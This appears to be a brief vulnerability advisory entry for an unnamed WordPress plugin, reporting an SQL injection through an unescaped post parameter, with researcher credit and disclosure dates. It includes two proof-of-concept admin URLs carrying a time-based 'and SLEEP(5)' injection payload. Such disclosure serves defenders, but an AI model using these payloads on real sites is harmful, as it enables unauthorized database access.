The plugin does not validate and escape a post parameter before using in a SQL statement, leading to an SQL Injection
https://example.com/wp-admin/post.php?post={valid_post_id}+and+SLEEP%285%29&action=edit https://example.com/wp-admin/admin-post.php?action=edit&post=1+and+SLEEP%285%29
Jeremie Amsellem
Jeremie Amsellem
Yes
2021-11-29 (about 7 months ago)
2022-02-15 (about 4 months ago)
2022-04-08 (about 3 months ago)